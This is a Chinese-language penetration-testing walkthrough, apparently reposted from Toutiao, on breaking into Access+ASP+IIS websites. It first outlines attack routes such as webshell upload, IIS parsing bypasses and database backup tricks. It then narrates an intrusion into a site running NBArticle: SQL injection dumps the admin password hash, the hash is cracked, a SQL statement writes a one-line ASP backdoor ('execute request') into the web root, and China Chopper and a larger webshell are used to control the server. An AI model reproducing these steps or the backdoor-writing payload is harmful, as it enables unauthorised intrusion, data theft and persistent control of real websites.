| 关键词: 网站 漏洞 后台 如图 地址 数据库 测试 SQL 直接 Webshell |
Access+Asp+IIS架构是最早的一种网站架构,主要用在公司站点或者小规模公司,对于这种架构网站的漏洞主要有SQL注入、文件目录信息泄露、文件上传、数据库下载以及弱口令等,其主要威胁来自于SQL注入,虽然目前Asp站点相对较少,但其是网络攻防体系中不可缺少的一部分。 1.1.1Access网站后台加密以及注入处理思路 1. Access+Asp+IIS架构后台加密算法 对于Access+Asp+IIS架构最常见的是md5 16位或者32位加密,有安全意识的站点会采用md5(password,salt)类似变异加密算法,其中最常见的就是通过自定义salt为一个强健的字符串,使得即使弱口令+salt的md5加密通过cmd5.com网站无法进行暴力破解。 2.SQL注入点处理思路 对于Access数据库+ASP网站存在的SQL注入点的一般处理思路主要有下面五个途径: (1)查看是否有直接可以上传Webshell的地方。如果存在则可以直接上传Webshell来获得Webshell控制权限。 (2)存在上传地址,但无法直接上传Webshell,可以尝试通过IIS解析漏洞等方法来绕过对文件后缀名的验证。 (3)备份数据库。在存在输入的页面加入一句话木马,然后将数据库备份为asa或者asp的文件。 (4)本地构建上传页面,通过抓包等方法本地提交到服务器。 (5)通过查询直接将一句话写入到一个文件中,方法即是本文用到的方法。 1.1.2渗透Access网站思路 Access网站的渗透思路跟其它网站类型类似,下面是根据笔者的经验进行总结,仅供参考。 1.对网站进行工具扫描 使用HDSI、明小子、WebCruiser、WVS等扫描工具软件进行初始漏洞扫描,获取最常见的漏洞。 2.手工对存在参数传入的地址进行测试 对网站存在参数传入的地方通过特殊字符等方式进行判断,如果存在出错,则可以进行手工或者工具自动注入测试。 3.使用工具对存在SQL注入点的地址进行漏洞测试,尝试获取表以及数据库内容。 4.获取管理员表及其用户名和密码等信息。 5.登录后台尝试通过前面提及的SQL注入点处理思路进行处理。 6.扫描后台地址,常见默认后台为admin,manage等。很多网站为了管理方便,往往会在首页添加链接地址。 7.手工挖掘或者测试已有漏洞,如果网站系统采用开源或者公开CMS,则可以通过互联网搜索历史漏洞,并对该网站尝试漏洞利用。如果历史漏洞无法使用,则需要手动挖掘系统漏洞。 8.网站敏感文件扫描,可以获取一些网站备份文件。 9.有些网站对mdb文件未做防下载处理,知道数据库地址后可以直接下载。如果文件名使用了特殊字符,则可以通过url地址转换来进行下载。 10.知道后台地址后,可以通过burpsuite等工具软件进行密码的暴力破解。 11.通过百度对网站进行检索,获取可以利用的信息。 1.1.3一个SQL注入漏洞利用实例 1.扫描漏洞 本次渗透测使用WebCruiser,软件官方下载地址:http://sec4app.com/。该软件不需要安装,不过需要.net FrameWork2.0以上环境支持。运行后如图1所示,在URL中输入本次需要扫描的地址“http://www.xxx.org”,然后在菜单栏中单击“Scanner”和“Scan Current Site”对目标站点进行扫描。WebCruiser扫描效果还是不错的,虽然也有误报,但对java扫描效果非常好。本次扫描结果表明目标网站有两个漏洞一个是SQL注入漏洞,另外一个是跨站漏洞。 ![]() 图1 扫描漏洞 2.SQL注入测试 在进行SQL注入测试前,需要更多的收集目标所使用系统的信息,通过探测和查看网页源代码,获知该系统使用NBArticle,通过网上下载了NBArticle的两个版本,对其数据库进行了分析和研究,该CMS系统管理员表名为NB_Master,将该表名和表字段添加到WebCruiser的系统设置中。 在漏洞扫描中选中存在SQL注入点的记录,然后进行SQL注入测试, SQL注入测试跟其它的SQL注入测试步骤相同,先猜测数据库,然后猜测表,再猜测表列名,最后猜测数据。如图2所示,直接获取了数据库中管理员的密码。 技巧: (1)由于已经知道该系统采用Access,因此在SQL注入测试时,Databases直接选择Access。 (2)在扫描出漏洞后,可以先在浏览器中进行sql注入测试,判断数据库类型。虽然WebCruiser可以自动扫描出数据库的类型,但效果不是特别好,软件有时候会长时间没有反应。 ![]() 图2 获取数据 3.进入后台 获取的密码值为16位的Cmd5加密值,将该值放入cmd5.com和xmd5.com进行破解,密码设置不是很复杂,免费就能查到。NBArticle的后台地址为http://www.xxx.org/manger/index.html,打开后台地址后输入管理员账号和密码,成功进入后台,如图3所示,虽然成功进入后台,但该管理界面中未提供上传功能,目标网站对代码进行过修改,有些功能都不能使用。 ![]() 图3 进入后台 4.获取Webshell 在后台中虽然有数据库备份,但无法获取数据库的真实地址,因此无法进行备份。也就无法通过一句话木马进行数据库备份。但在高级管理中提供了SQL语句直接执行功能,如果知道网站的真实路径,那么可以通过执行SQL语句直接生成一句话密码。通过分析发现,后台首页提供了服务器信息,如图4所示,直接获取了网站后台的真实地址。 ![]() 图4 获取网站真实路径 5.导入shell到网站根目录 如图5所示,在SQL语句中输入“SELECT <%execute request("a")%> into [NB_master] in d:\wwwroot\\x.asp;a.xls excel 8.0; from NB_Master”然后执行即可获得一句话后门。注意NB_Mater是CMS系统真实存在的表,否则无法执行成功。使用中国菜刀进行一句话木马测试,如图6所示,成功获得该网站的Webshell权限。 ![]() 图5 执行SQL语句获取Webshell ![]() 图6 获取Webshell 6.上传大马进行控制 在中国菜刀中直接上传一个aspnet的Webshell,运行后如图7所示,通过该Webshell来查看数据库以及系统配置等信息。 ![]() 图7进一步收集信息 由于该网站的权限配置很严格,通过多种提权工具和方法未能获得系统管理员权限,只能放弃。 |
| 本文出处: https://www.toutiao.com/a6674520017704321549/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|